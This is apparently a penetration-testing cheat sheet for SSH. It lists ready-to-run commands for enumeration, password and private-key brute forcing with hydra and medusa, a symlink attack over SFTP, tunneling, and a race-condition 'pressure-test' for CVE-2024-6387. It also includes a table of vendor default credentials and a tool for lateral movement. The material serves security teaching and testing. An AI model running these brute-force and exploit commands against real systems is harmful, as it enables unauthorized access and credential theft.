SSH (Secure Shell) provides a secure encrypted connection to a remote computer. It is essential for maintaining confidentiality and integrity when accessing remote systems.
Default Port: 22
Enumeration
Banner Grabbing
ssh-audit (Configuration Audit)
python3 ssh-audit <IP>
# Reports: cipher algorithms, key exchange, host key algorithms, MACs
# Flags deprecated, unsafe, or weak algorithms
Nmap Scripts
nmap -p22 <ip> -sC # Default scripts
nmap -p22 <ip> -sV # Version detection
nmap -p22 <ip> --script ssh2-enum-algos # Supported algorithms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"
Public Key Scan
ssh-keyscan -t rsa <IP> -p <PORT>
Brute Force
Username Enumeration
# Timing-based username enumeration (some OpenSSH versions)
msf> use scanner/ssh/ssh_enumusers
Password Brute Force
hydra -v -V -u -l <username> -P <Big_Passwordlist> -t 1 <IP> ssh
medusa -u <user> -P <passwordlist> -h <IP> -M ssh
Private Key Brute Force
# Test known private keys against target
nmap --script ssh-publickey-acceptance -p22 <IP>
# SSH-keybrute (lightweight)
python3 ssh-keybrute.py -h <IP> -u <user> -d /path/to/keys/
# Check badkeys database
# https://github.com/rapid7/ssh-badkeys
Debian Weak PRNG Keys
Some Debian systems have known weak random seed generating predictable keys:
# Download pre-generated key sets
# https://github.com/g0tmi1k/debian-ssh
Kerberos / GSSAPI SSO
If the SSH server supports GSSAPI (e.g., Windows OpenSSH on a domain controller):
# 1. Sync time with KDC
sudo ntpdate <dc.fqdn>
# 2. Generate krb5.conf
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
# 3. Obtain TGT
kinit <user>
klist
# 4. SSH with GSSAPI
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
SSH MitM Attack
Requires being on the local network:
- Divert victim’s traffic (ARP spoofing, DNS spoofing)
- SSH-MITM acts as proxy, capturing credentials
- Forwards commands to real server and relays responses
SFTP Misconfigurations
Command Execution Bypass
Users with non-interactive shells (/usr/bin/nologin) can sometimes execute commands:
SFTP Secure Configuration
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
SFTP Symlink Attack
sftp> symlink / froot
# Now accessing froot/ via web returns the root filesystem
SFTP Tunneling
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
Critical Vulnerabilities
CVE-2024-6387 – regreSSHion
OpenSSH 8.5p1–9.7p1 on 32-bit Linux: unauthenticated RCE via signal-handler race condition in SIGALRM handler. LoginGraceTime must be non-zero.
# Fingerprint the version
ssh -V
# Detect with nmap
nmap -p22 --script ssh-auth-methods <IP>
# Pressure-test (PoC only - timing-based)
parallel -j200 "timeout 3 ssh -o PreferredAuthentications=none -o ConnectTimeout=2 attacker@${TARGET}" ::: {1..4000}
CVE-2024-3094 – XZ Utils Backdoor
XZ Utils 5.6.0 and 5.6.1 shipped backdoored tarballs that hook RSA_public_decrypt in sshd for pre-auth RCE:
# Check if affected
xz --version
dpkg -l xz-utils
rpm -qi xz
# Check if sshd loads the backdoor
ldd /usr/sbin/sshd | grep -E "systemd|lzma"
CVE-2025-32433 – Erlang/OTP Pre-Auth RCE
Affected: OTP < 27.3.3, 26.2.5.11, 25.3.2.20
Fix: Upgrade to patched versions
Impact: Unauthenticated RCE (daemon usually runs as root)
# Detection: SSH banner shows Erlang/OTP
# Ports: 22, 2022, 830, 2222
libssh CVE-2018-10933
Server-side libssh 0.6–0.8 accepts SSH_MSG_USERAUTH_SUCCESS from client without authentication.
SSH-Snake (Lateral Movement)
# Automatically find private keys and propagate
# https://github.com/MegaManSec/SSH-Snake
# Discovers keys, finds destinations, attempts SSH, repeats recursively
Default Credentials Reference
| Vendor | Usernames | Passwords |
|---|
| APC | apc, device | apc |
| Cisco | admin, cisco | admin, cisco123, C1sco!23 |
| Dell | root, admin | calvin, Password123 |
| HP/3Com | admin, root | admin, password, hpinvent |
| VMware | vi-admin, root | vmware, vmw@re |
Config Files
ssh_config # Client config
sshd_config # Server config
authorized_keys # Trusted public keys
known_hosts # Known server keys
id_rsa # Default private key location
~/.ssh/
